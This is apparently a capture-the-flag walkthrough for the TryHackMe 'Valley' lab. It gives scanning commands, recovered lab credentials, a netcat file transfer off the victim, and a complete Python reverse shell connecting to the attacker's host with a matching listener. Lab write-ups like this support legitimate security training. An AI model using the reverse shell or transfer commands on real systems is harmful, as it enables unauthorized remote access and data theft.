Valley
Room Link: https://tryhackme.com/room/valleype
Initial Scan
Kali
nmap -A $VICTIM

Scan all ports
ftp found on port 37370
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt


Kali
gobuster dir --url http://$VICTIM/static -w /usr/share/dirb/wordlists/big.txt -l

Kali
ffuf -u http://$VICTIM/static/FUZZ -w /usr/share/dirb/wordlists/big.txt




Username: siemDev
Password: california

TCP/37370 - FTP
Kali
ftp $VICTIM 37370
Username: siemDev
Password: california

TCP/22 - SSH
Kali
ssh valleyDev@$VICTIM
Password: ph0t0s1234

Kali

Lateral Movement
Netcat
Kali(receiving)
nc -l -p 1234 > valleyAuthenticator
Victim(sending)
nc -w 3 $KALI 1234 < valleyAuthenticator
Kali
strings valleyAuthenticator > out.txt


Victim
Username: valley
Password: liberty123

Victim
cat /photos/script/photosEncrypt.py

Victim
locate base64
ls -lah /usr/lib/python3.8/base64.py
groups

Python Reverse Shell
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("$KALI",1337))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])
Kali
nc -lvnp 1337

Last updated